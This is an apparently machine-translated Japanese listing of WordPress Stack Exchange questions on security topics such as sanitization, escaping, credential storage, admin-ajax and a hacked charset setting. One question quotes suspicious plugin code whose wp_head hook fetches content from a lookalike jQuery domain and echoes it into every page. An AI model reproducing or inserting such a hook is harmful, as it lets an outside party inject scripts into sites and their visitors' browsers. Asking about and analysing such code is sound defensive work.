タグ付けされた質問 「security」

閉まっている。この質問はトピック外です。現在、回答を受け付けていません。 この質問を改善したいですか？ 質問を更新することがありますので、上のトピックワードプレスの開発スタックExchange用。 4年前に閉鎖されました。 プラグインSimple Login Lockdownをインストールしました。数日前から、データベースは1日で200を超えるレコードを記録しています。 私のサイトを非常に多くのIPに攻撃させることは不可能だと思う 何かおかしいと思いますか？

20 login  security 

WordPressは初めてです。最近、ハッカーがプラグインの脆弱性を悪用する方法についての記事を読みました。Google Pagespeedなどのさまざまなソースも、プラグインの使用を思いとどまらせるか、少なくとも最小限に抑えています。個人的には、自分のサイトで何が起こるかをもっとコントロールできると感じているため、プラグインも避けようとしています。 「プラグインの推奨」はトピック外であることを理解していますが、実際に必要なのは、WordPressでいくつかのプラグインが必須であるかどうかの説明です。 以下に例を挙げます。 セキュリティ -いくつかのトッププラグインはセキュリティに関係しています。しかし、WordPressサイトは一般的に脆弱ですか？悪用を避けるために追加のプラグインが必要なのはなぜですか？ バックアップ -ブログの世界は初めてですが、ほとんどのホストはバックアップサービスを提供していませんか？または、WordPressでそのための特別なプラグインが必要ですか？ AdSenseクリック詐欺の監視 -クリック爆弾をブロックして、Googleからの追放を回避することになっています。しかし、プラグインをダウンロードしない限り、収益を停止するためにすべての人がしなければならない偽のクリックはいくつかありますか？ 編集：Googleサポートでこれを尋ねる方が良いかもしれませんが、そうであれば無視してください

19 plugins  security 

最近ハッキングされたクライアントがいて、サイトにÂやlikeのような奇妙なキャラクターが現れていることに気付きました。ハッカーがwp_optionsデータベースのテーブルでblog_charsetをUTF-7に変更したことがわかりました。UTF-8に戻しましたが、その間にUTF-7に設定されたときに、セキュリティ上の脆弱性が生じるのではないかと考えていましたか？ いくつかの検索を行ったところ、バージョン2.0.6で修正されたWordPress UTF-7の脆弱性があったことを発見しました。WordPressの最新バージョンを実行しているため、そのエクスプロイトを使用することはできませんでしたが、UTF-7に関連する他のエクスプロイトはありますか？本当に、ハッカーが苦痛以外にblog_charsetを変更する理由はありますか？私は彼らがどうやって入ったのかを判断しようとしており、これがどういうわけか接続されているのだろうかと思っています。

19 security  encoding  hacked  characters 

現在プラグインを開発していますが、他の人が使用できるように公開プラグインリポジトリでリリースする可能性が高いでしょう。 プラグインはAPIを使用します。このAPIを使用するには、ユーザー名とパスワードを渡す必要があります。したがって、プラグインはこれらのログイン資格情報をデータベースに保存する必要があります。APIではプレーンテキストで必要ですが、これらをプレーンテキストで保存したくありません。 だから私の質問は、これらの機密情報をどのように保存するのですか？ハッシュは公開されていないため、何らかの暗号化が必要です。 WordPressには、ブログごとに異なるユニークなキーを使用できますか？暗号化および復号化に使用するPHP関数は何ですか？すべてのWPインストールで動作する可能性が高い機能を探しています。

19 plugin-development  security  api  encryption 

プラグインでこれを見つけました。それは何をするためのものか？それは危険ですか？ add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

プラグイン/テーマのすべてのデータが、データベースに入る前とブラウザーに出力される前に、安全に処理されるようにします。私の問題は、ポストメタフィールドを保存するときなど、APIがサニタイズを処理する状況と、カスタム設定を保存するときなど、プラグイン/テーマの作成者がそれを行う責任がある状況があることです。 この質問の範囲については、ドメインレベルでのデータの検証については心配していません。たとえば、フォームのAgeフィールドが0〜120であるか、電子メールアドレスが有効であることを確認します。私はセキュリティだけに関心があります。たとえば、データベースへの保存時にSQLインジェクションを回避するためにSQLクエリをエスケープしたり、XSSを回避するためにHTMLテンプレートに出力されるデータを無害化します。 出力のサニタイズについては、変数をHTMLテンプレートにエコーするときなどにesc_html()、常に関数を使用する必要があることを知っていますesc_attr()。しかし、テンプレートタグを使用する場合はどうでしょうか。それらはすべて既に出力をサニタイズしますか？その場合、どのコンテキスト（一般的なHTML、タグ属性など）ですか？一部の関数には、さまざまなコンテキストのバリアントがあります（などthe_title_attribute()ですが、ほとんどはありません 入力サニタイズについては、$wpdb->prepare()手動クエリを作成するときに使用する必要があることは知っていますが、Settings APIを使用してプラグイン設定ページを作成する場合、またはカスタム投稿タイプの投稿メタフィールドを保存する場合はどうですか？ 現在、関数を使用して関数がサニタイズするかどうかを調べるたびにコアを掘り下げてチュートリアルを読んでいますが、それはエラーが発生しやすく、時間がかかります。考えられるすべての状況と、APIがそれを処理するかどうかの包括的なリストを見つけたいと思っています。例えば、 APIの検証/サニタイズ 投稿メタを保存 update_postmeta() ユーザーメタを保存 update_user_meta() 投稿タイトルの出力-コンテキストに応じた適切なバリアントを使用します the_title() 等 手動で検証/サニタイズする必要があります Settings APIを使用してプラグインオプションを保存する。の3番目のパラメーターとしてコールバックを渡しますregister_setting()。 直接データベースクエリ：クエリをにラップします$wpdb->prepare()。 HTMLで変数を出力します。使用esc_attr()、esc_html()など 等 また、特定の状況ではAPIが提供するが、他の状況では提供しない理由を理解したいと思っています。私はそれがデータの未知の性質と関係があると仮定していますが、徹底的な説明を聞きたいです。

17 plugin-development  security  customization  validation  sanitization 

ワードプレスの新しいバージョンでの保存wp-admin/install.phpとwp-admin/install-helper.phpセキュリティリークはありますか？デフォルトでは、これらのファイルのファイル許可は644です。 漏れがある場合は、どんな種類をお願いしますか？

16 security  installation 

現在のところ、この質問はQ＆A形式には適していません。回答は、事実、参考文献、または専門知識によってサポートされると予想されますが、この質問は、議論、議論、世論調査、または広範な議論を求める可能性があります。この質問を改善し、場合によっては再開できると思われる場合は、ヘルプセンターをご覧ください。 7年前に閉鎖されました。 WPプラグインの開発者として、私が探すべき主なセキュリティ上の欠陥/穴は何ですか？ 構成パネル（入力フィールドなど）で新しいプラグインを作成しようとしています。何を心配する必要がありますか？ たとえば、/ wp-admin /領域にあるため、データのサニタイズは非常に重要ですか？悪意のある人がプラグインページに直接アクセスして、POSTリクエストなどを送信できますか？ ありがとうございました！

16 plugins  plugin-development  security  sql 

SVGはメディアアップローダーでデフォルトでブロックされていることがわかりますが、functions.phpでサポートされているMIMEタイプとして追加する必要があります。この背後にあるセキュリティ上の理由は何ですか？

15 media  security  svg 

私はコードを見ましたが、the_title the_content the_excerptなどの機能で逃げるのを見ることができませんでした。私はそれを正しく読んでいないかもしれません。次のようなテーマ開発でこれらの関数をエスケープする必要がありますか？ esc_html ( the_title () ) 編集：以下の回答で指摘されているように、上記のコードは関係なく間違っています-コードは読む必要があります esc_html ( get_the_title () )

15 security  escaping 

外部開発者といくつかの問題があります。 wp-adminサイトへのアクセスを内部アクセスのみに制限したい（VPN経由）。単純に、外部ユーザーによる攻撃を受けないようにします。サイトから管理者を列挙することができ、フィッシングを望まない。 開発者は、サイトが管理ページを外部からアクセスできるようにして、ページが機能する必要があるため、それができないと言っています。特にadmin-ajaxページ。 admin-ajax.phpページは何をしますか？ WordPressの管理セクションにあります。エンドユーザーによって認証されずにアクセスされますか？これを外部ユーザーが利用できるようにするのは安全ではありませんか？

14 admin  ajax  security 

セキュリティに関して少しだけ役立つかもしれない簡単な質問です。readme.htmlファイルにリストされているバージョン番号があることに気付きました。各アップグレード後に再表示されるため、licence.txtおよびwp-config-sample.phpも同様です。 アップグレード後にWordPressでこれらのファイルを自動的に削除する簡単な方法はありますか？ メタタグ、RSSフィード、Atomなどにバージョン番号が表示されないように既にブロックしています。 この種のセキュリティはそれほど有用ではないことは知っていますが、それはほんの小さな始まりに過ぎないと考えました。WP-includesに含まれているjQueryのバージョンを簡単に確認でき、どのバージョンのWPがそれを出荷したかを相互参照できると聞きました。

13 security  wp-config 

WordPressをアプリケーション内で更新するように構成する（つまり、WordPress）のは、その便利さから理想的です。それにもかかわらず、私は要件に悩まされています。ssh2 for phpをインストールした後に表示される要求フィールドでは、公開鍵だけでなく秘密鍵も要求されます。せいぜい公開鍵だけが必要だと思います。 WordPressは、サーバーが正しいソフトウェアパッケージをサーバーにアップロードできるように、実際に秘密キーをサーバーに提供しますか？私はSSH秘密/公開鍵がどのように機能するかをよく知っているので、WordPressがこれを必要とする理由を混乱させています。どちらかといえば、更新のメカニズムにはこのプロトコルさえ必要ないと思います。パッケージサーバーに対してhttpまたはftpを使用し、そこからダウンロード/インストール/アクティブ化するだけです。 WordPressにsshキーが必要なのはなぜですか？ここにセキュリティ上の懸念はありますか？

13 security  updates  ssh 

以下のためのコーデックスを見ると）wp_insert_post（それは、この機能「...サニタイズ変数は、日付/時間などのような変数が欠落していくつかのチェック、塗りつぶしを行います」と述べている（編集：私は、コーデックスのエントリ更新より堅牢な例を含むようにしますこれには、セキュリティと投稿メタおよびカテゴリの割り当てが含まれます） XSSハッキングなどを防ぐためにさらにサニタイズを行う必要があるのか​​、それとも関数によって十分な処理が行われているのか疑問に思っています。 正直に言うと、私はコアの関数をチェックしましたが、たとえばpost_contentでwp_kses（）やその他のサニタイズを見つけていないので、少し心配しています。確認できるのは、データに対するstripslashes_deep（）だけです。 wp_insert_post（）への引数を作成するときに、wp_kses（）または他の何かを実行する必要がありますか？ ここでのベストプラクティスは何ですか？Codexは、その例ではセキュリティについてかなり無頓着です。 ありがとう

13 security  sanitization 

これは私のコーディングを難しくします。Wordpress codexは、セキュリティについて漠然と話すことでesc_urlの使用を理由としています。しかし、それは本当にトラブルに値するのでしょうか？ たとえば、次を使用することによる重要で実用的なセキュリティ上の利点は何ですか <?php echo esc_url( home_url( '/' ) ); ?> の代わりに <?php echo home_url() ?> PS：私はテーマ開発について話しているのではなく、特定のサイトについて話している。

12 security